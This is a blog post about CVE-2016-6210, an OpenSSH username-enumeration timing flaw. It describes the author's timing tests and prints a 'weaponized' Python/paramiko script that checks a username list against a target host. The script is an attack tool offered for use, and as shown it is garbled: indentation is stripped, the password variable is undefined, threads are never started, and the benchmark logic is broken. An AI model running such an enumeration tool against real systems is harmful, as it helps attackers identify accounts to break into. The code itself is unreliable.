Analyzing and Weaponizing the Latest OpenSSH Enumeration Vulnerability [CVE-2016-6210]

Analyzing and Weaponizing the Latest OpenSSH Enumeration Vulnerability

From people expressing their distaste in the overall "hype", to a large number of people claiming that either they cannot get it to work, or that the vulnerability is simply invalid, and even more people asking whether or not this is a rehashing/re-release of a few older OpenSSH timing vulnerabilities || CVE-2006-5229.

The majority of the hate has come from those that are saying password(s) shouldn't be

I decided to do some analysis myself to verify exploitability as well as learn a little bit about the unavoidable semantics of yet-another-timing-attack.


Posted by Eddie Harari on Full Disclosure

The brief:

By sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most
modern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.

The (more) technical:

When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD
source code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.
If real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter
response time from the server for non-existing users.

NOTE: Mr. Harari tested this on opensshd-7.2p2, while my testing was done on OpenSSH_6.9p1.

Cannibalizing the code shared by Mr. Harari I wrote up a PoC that would allow me to get the data I require to verify this vulnerability's authenticity.

I ran 3 separate tests (a total of 4688 requests) letting it continuously iterate through my list of account names (valid and invalid), and write the results to a csv for analysis.

Included below are the two main tests and their results.

Excel() -> Sort() -> Graph() -> Light() -> Eyes()

The results were obvious -

Test 1:

Valid Users: realuser & test.
Raw Data -
I realized late that the usernames I chose are rather confusing

Test 2:

Valid Users: justice, realuser, enumme.
Raw Data

We can plainly see that the existing users take significantly longer than the rest.
  • Non-Existing user average per request: 0.04704169506518s
  • Existing user average per request: 0.21342703801396s

Currently working on developing a effective response-timing threshold for tool based determination of "valid" usernames, as well as emulating all of this functionality in C.

Below is the first version of the "weaponized" exploit for this. It is currently based around a 10-30% range of deviation for timing(s) of valid versus invalid usernames. Currently only >20% are accepted as valid usernames and appended to the output list accordingly (feel free to tweak this within the script). This has proved effective for me.


import paramiko

import time, sys, csv, os

import threading, multiprocessing

import logging

if(len(sys.argv) < 4):

print "REL: CVE-2016-6210"

print "Usage: "+sys.argv[0]+" uname_list.txt host outfile"



THREAD_COUNT = 3 # This is also the amount of "samples" that the application will take into account for each calculation (time/THREAD_COUNT) = avg_resp;

FAKE_USER = "AaAaAaAaAa" # Benchmark user, I definitely don't exist


num_lines = sum(1 for line in open(sys.argv[1]))

username_list = sys.argv[1]

var = 0; time_per_user = 0;

threads = []; usertimelist = {};

def ssh_connection(target, usertarget, outfile):

global time_per_user

starttime = 0; endtime = 0; total = 0;

ssh = paramiko.SSHClient()


starttime = time.clock()


ssh.connect(target, username=usertarget,password=p)


endtime = time.clock() # TIME the connection

total = endtime - starttime

# print usertarget+" : "+str(total) # print times of each connection attempt as its going (username:time)

with open(outfile, 'a+') as outputFile:

csvFile = csv.writer(outputFile, delimiter=',')

data = [[username, total]]


time_per_user += total

if not os.stat(username_list).st_size == 0:

print "- Connection logging set to paramiko.log, necessary so Paramiko doesn't fuss, useful for debugging."


ssh_bench = paramiko.SSHClient()


print "- Calculating a benchmark using FAKE_USER for more accurate results..."

tempbench = []

for i in range(0,THREAD_COUNT):

starttime = time.clock()


ssh_bench.connect(sys.argv[2], username=FAKE_USER,password=p)


endtime = time.clock()


BENCHMARK = sum(i for i in tempbench)/5

print "* Benchmark Successfully Calculated: " + str(BENCHMARK)

with open(username_list) as users:

for username in users:

username = username.replace('\n','')

for i in range(THREAD_COUNT):

threader = threading.Thread(target=ssh_connection, args=(sys.argv[2], username, sys.argv[3]))


for thread in threads:



threads = []

print "[+] Averaged time for username "+username+" : "+str((time_per_user/THREAD_COUNT))

usertimelist.update({username : (time_per_user/THREAD_COUNT)})

time_per_user = 0


print "[-] List is empty.. what did you expect? Give me some usernames."

# [thread.start() for thread in threads]

# [thread.join() for thread in threads]

for user in sorted(usertimelist.items(), reverse=True):


fname = sys.argv[2].replace('.','_')+"_valid_usernames.txt"

if((BENCHMARK <= .10)): # 10% or less

print "[+] " + user[0] + " invalid user; less than 10 percent of benchmark at: "+str(BENCHMARK)

elif ((BENCHMARK) < .20):

print "[+] " + user[0] + " toss up, not including based on current settings at: "+str(BENCHMARK)

elif (((BENCHMARK) >= .20) and (BENCHMARK) < .30): # 20% greater

print "[+] " + user[0] + " likely a valid user at: "+str(BENCHMARK) + ". Appending to: " + fname

with open(fname, "a+") as outputFile:


elif ((BENCHMARK) >= .30): # 30% or greater above the benchmark

print "[+] " + user[0] + " is a valid user, appending to: " + fname

with open(fname, "a+") as outputFile:


Coming maybe sometime ever soon:
  • Get true threads working for efficiency (right now it's rather slow); had issues with timing when true threading was used (also tried subprocesses). If someone gets this feel free to let me know, I would gladly update this.
  • Re-release in C. Added to the Github repository; All credits for the C rendition go to my friend and wonderful artist Anthony Garcia.
More posts
Piercing the Boundaries: BRM Capability and B2B Collaboration.

Let’s take a deeper look to understand a Business Relationship Management Capability then what is meant by B2B Collaboration and finally defining what needs to transpire in order to pierce the boundaries.‍

read more
Culture Shock: Developing a Workplace Culture that Fosters Your Brand-New BRM Capability

Culture Shock is usually an understatement when an organization makes the commitment to implement a BRM Capability.

read more
The Prevalence of Scamming on Our Favorite Shopping Sites

During this search, I became aware of how prevalent scamming has become and the seemingly high-volume migration of craigslist scammers into other marketplaces and platforms.

read more